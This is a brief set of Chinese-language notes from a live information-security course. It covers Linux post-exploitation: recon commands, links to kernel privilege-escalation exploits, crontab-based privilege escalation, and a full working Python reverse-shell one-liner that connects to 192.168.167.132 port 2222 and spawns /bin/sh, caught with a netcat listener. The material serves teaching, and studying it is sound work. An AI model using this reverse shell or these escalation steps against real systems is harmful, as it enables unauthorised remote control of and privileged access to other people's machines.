西普信息安全直播课记录

http://www.nisphome.cn/article-detail?id=164

打扫战场——后门清除与总结

whoami查看用户名
cat /proc/version 查看linux版本
linux内核漏洞提权
https://github.com/SecWiki/linux-kernel-exploits
crontab提权 https://www.freebuf.com/articles/system/175453.html
/etc/crontab 定时任务
简单的反向shell脚本

1
2
3

#!/bin/bash
# linux上简单的反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.167.132",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

用netcat -lvp 2222监听